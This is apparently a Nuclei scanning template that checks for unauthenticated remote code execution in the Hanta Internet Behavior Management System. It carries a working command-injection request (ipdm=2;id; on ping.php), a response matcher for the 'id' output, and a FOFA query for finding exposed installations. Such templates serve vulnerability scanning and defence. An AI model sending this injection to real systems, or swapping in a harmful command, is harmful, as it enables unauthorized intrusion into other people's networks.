id: hanta-rce

info:
  name: Hanta Internet Behavior Management System - Remote Code Execution
  author: momika233
  severity: high
  description: Hanta Internet Behavior Management System is vulnerable to RCE.
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="汉塔科技上网行为管理系统"
  tags: hanta,rce,unauth

http:
  - method: GET
    path:
      - "{{BaseURL}}/dgn/dgn_tools/ping.php?ipdm=2;id;"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a004730450221008d7467d2240f06e194043ebaef9101297d5bd24253ec911c56957098c6e8aefa0220765187478b0ed78c65217dbe4b80b4808f937630ea5b96e70e9f9fd71a8b18cb:922c64590222798bb761d5b6d8e72950